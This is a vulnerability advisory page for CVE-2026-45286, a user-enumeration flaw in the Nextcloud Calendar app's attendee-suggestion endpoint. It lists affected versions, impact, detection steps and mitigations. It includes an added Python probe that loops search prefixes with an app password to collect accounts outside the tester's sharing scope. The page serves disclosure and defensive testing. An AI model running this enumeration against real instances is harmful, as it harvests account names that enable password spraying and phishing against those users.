CVE-2026-45286
Status: Analyzed (analysis complete)
User Enumeration via Calendar Attendee Suggestions in Nextcloud

Publication date: 2026-06-01

Last updated on: 2026-06-03

Assigner: GitHub, Inc.

Description
Nextcloud is an open source content collaboration platform. From versions 5.5.13 to before 5.5.17, and 6.2.0 to before 6.2.3, an authenticated user can enumerate users on the same Nextcloud instance by using the Calendar app's endpoint for suggesting attendees. The sharing restrictions, applied to other endpoints, were not effective here. This issue has been patched in versions 5.5.17 and 6.2.3.
Meta Information
Published: 2026-06-01
Last Modified: 2026-06-03
Generated: 2026-06-22
AI Q&A: 2026-06-01
EPSS Evaluated: 2026-06-20
Affected Vendors & Products (2 associated CPEs)
Vendor      Product    Version / Range
nextcloud   calendar   from 5.5.13 (inclusive) to 5.5.17 (exclusive)
nextcloud   calendar   from 6.2.0 (inclusive) to 6.2.3 (exclusive)
CWE
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor): The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Executive Summary

CVE-2026-45286 is a user enumeration vulnerability in the Nextcloud Calendar app affecting versions 5.5.13 to before 5.5.17 and 6.2.0 to before 6.2.3. Any authenticated user can query the app's attendee suggestion endpoint and obtain the accounts of other users on the same Nextcloud instance. The sharing restrictions that the instance enforces on its other endpoints were not applied to this one, so it returned user information the caller was not authorized to see.

In practice this lets a user bypass the instance's privacy controls and discover people in groups they should not be able to see: the attendee autocomplete listed all users regardless of group restrictions or Share-API settings.

Impact Analysis

This vulnerability affects confidentiality only: an attacker with an ordinary authenticated account can enumerate account identities that group or sharing restrictions were meant to hide from them. No integrity or availability impact is described.

The severity depends on how much the instance relies on those restrictions. Where a single deployment hosts separate departments or customers and isolates them by group-restricted sharing, this endpoint lets each group see the membership of every other. A confirmed list of valid account names is also the usual starting point for follow-on attacks such as password spraying and targeted phishing, and the exposure undermines trust in the platform's ability to enforce its own access controls.

Compliance Impact

This vulnerability poses a significant data protection risk by allowing unauthorized access to user information that should be restricted. Such unauthorized disclosure of personal data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require strict controls over access to personal and sensitive information.

Because the vulnerability bypasses sharing and privacy settings, it undermines the principle of data minimization and confidentiality mandated by these regulations, potentially resulting in legal and regulatory consequences for affected organizations.

Detection Guidance

The quickest triage step is a version check: any installed Calendar app from 5.5.13 to before 5.5.17 or from 6.2.0 to before 6.2.3 is affected. To confirm exposure on a running instance, test the attendee suggestion endpoint directly rather than relying on the UI: the question is whether an authenticated, low-privileged account receives suggestions for accounts outside its permitted sharing scope.

A practical approach: on an instance where sharing is restricted (for example the admin setting that limits users to sharing with members of their own groups), authenticate as an ordinary user who belongs to one group, drive the Calendar app's attendee autocomplete with a series of short search prefixes, and collect every account it returns. Any account that is neither the tester nor a member of the tester's groups is a finding. Running the same search against an endpoint that does honour the restriction, such as the share-recipient search used by the Files app, gives a baseline for comparison.

The available resources do not give the endpoint path or a specific command. Capture the request the Calendar UI sends from the browser's network tab, then replay it with curl, Postman or a short script using an app password, and compare the accounts returned against the set the user is entitled to see.
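The following script is an added example of the check described above, written here for this page; it is not code from the CVE record or from the Nextcloud project. The endpoint path, the name of the search parameter, the request method, the JSON response shape and the `uid` field are all assumptions, because the record does not state them: capture the real request from the browser and set `--path`, `--param`, `--post` and `--key` to match. The enumeration loop and the scope comparison are separated from the network call so they can be exercised offline against the constructed sample response embedded in the script.

```python
"""Probe a Nextcloud Calendar attendee-suggestion endpoint for user enumeration.

Added example. The endpoint path, query parameter and response shape are
ASSUMPTIONS, not values taken from the CVE record or the Calendar app.
"""
import argparse
import base64
import json
import string
import urllib.parse
import urllib.request

# Constructed sample response in the ASSUMED shape: a JSON array in which
# account entries carry a "uid" and address-book contacts carry none.
SAMPLE_RESPONSE = json.dumps([
    {"uid": "alice", "name": "Alice", "email": "alice@example.org"},
    {"uid": "bob", "name": "Bob", "email": "bob@example.org"},
    {"uid": "carol", "name": "Carol", "email": "carol@example.org"},
    {"name": "External contact", "email": "ext@example.net"},
])


def extract_uids(body, key="uid"):
    """Account identifiers present in one suggestion response.

    Accepts a bare array or a {"data": [...]} wrapper (ASSUMED). Entries
    without the identifier key are skipped: they are contacts, not accounts.
    """
    entries = json.loads(body)
    if isinstance(entries, dict):
        entries = entries.get("data", [])
    return {e[key] for e in entries if isinstance(e, dict) and key in e}


def enumerate_accounts(fetch, prefixes=string.ascii_lowercase, key="uid"):
    """Union of the accounts returned for each search prefix.

    `fetch(prefix)` returns a response body. Taking a callable keeps the
    enumeration loop testable without a network connection.
    """
    found = set()
    for prefix in prefixes:
        found |= extract_uids(fetch(prefix), key)
    return found


def leaked_accounts(found, allowed, self_uid):
    """Accounts outside the tester's permitted scope.

    `allowed` is what the tester may legitimately see (e.g. members of its
    own groups under group-restricted sharing). A non-empty result means the
    endpoint is not applying the sharing restriction.
    """
    return set(found) - set(allowed) - {self_uid}


def make_fetcher(base_url, path, param, user, app_password,
                 post=False, requesttoken=None):
    """Return fetch(prefix) that calls the endpoint with HTTP basic auth.

    Nextcloud accepts app passwords over basic auth. Routes that are not
    CSRF-exempt additionally require a valid `requesttoken` header taken
    from a logged-in browser session; supply it if the probe returns 412.
    """
    token = base64.b64encode(f"{user}:{app_password}".encode()).decode()
    headers = {"Authorization": f"Basic {token}", "Accept": "application/json"}
    if requesttoken:
        headers["requesttoken"] = requesttoken
    url = f"{base_url.rstrip('/')}{path}"

    def fetch(prefix):
        if post:
            body = json.dumps({param: prefix}).encode()
            req = urllib.request.Request(
                url, data=body, method="POST",
                headers={**headers, "Content-Type": "application/json"})
        else:
            req = urllib.request.Request(
                f"{url}?{urllib.parse.urlencode({param: prefix})}",
                headers=headers)
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read().decode("utf-8")

    return fetch


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description=__doc__)
    ap.add_argument("base_url")
    ap.add_argument("user")
    ap.add_argument("app_password")
    ap.add_argument("--path", required=True,
                    help="route captured from the browser (not given in the record)")
    ap.add_argument("--param", default="search", help="ASSUMED search parameter name")
    ap.add_argument("--post", action="store_true", help="send a JSON POST instead of GET")
    ap.add_argument("--key", default="uid", help="ASSUMED account identifier field")
    ap.add_argument("--allowed", default="", help="comma-separated uids the user may see")
    ap.add_argument("--requesttoken")
    args = ap.parse_args()

    fetch = make_fetcher(args.base_url, args.path, args.param, args.user,
                         args.app_password, args.post, args.requesttoken)
    found = enumerate_accounts(fetch, key=args.key)
    leaked = leaked_accounts(found, {u for u in args.allowed.split(",") if u}, args.user)
    print(f"accounts returned: {sorted(found)}")
    print(f"outside permitted scope: {sorted(leaked)}")
    raise SystemExit(1 if leaked else 0)
```

Run it as the low-privileged test user with `--allowed` set to the members of that user's groups; a non-zero exit with a non-empty "outside permitted scope" list is a finding. Pass the same arguments against the Files app's share-recipient search to obtain the expected (restricted) baseline, and remember that a clean result only proves the restriction holds for the prefixes tried, so keep the full lowercase alphabet as the prefix set.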

Mitigation Strategies

The primary mitigation is to upgrade the Nextcloud Calendar app to a patched release: 5.5.17 or later on the 5.5 branch, or 6.2.3 or later on the 6.2 branch.

If upgrading immediately is not possible, the recommended workaround is to disable the Calendar app (from the Apps page, or with `occ app:disable calendar`) until it can be updated. This removes the vulnerable endpoint but also removes calendar functionality for every user, so treat it as a temporary measure and re-enable the app only after the upgrade.
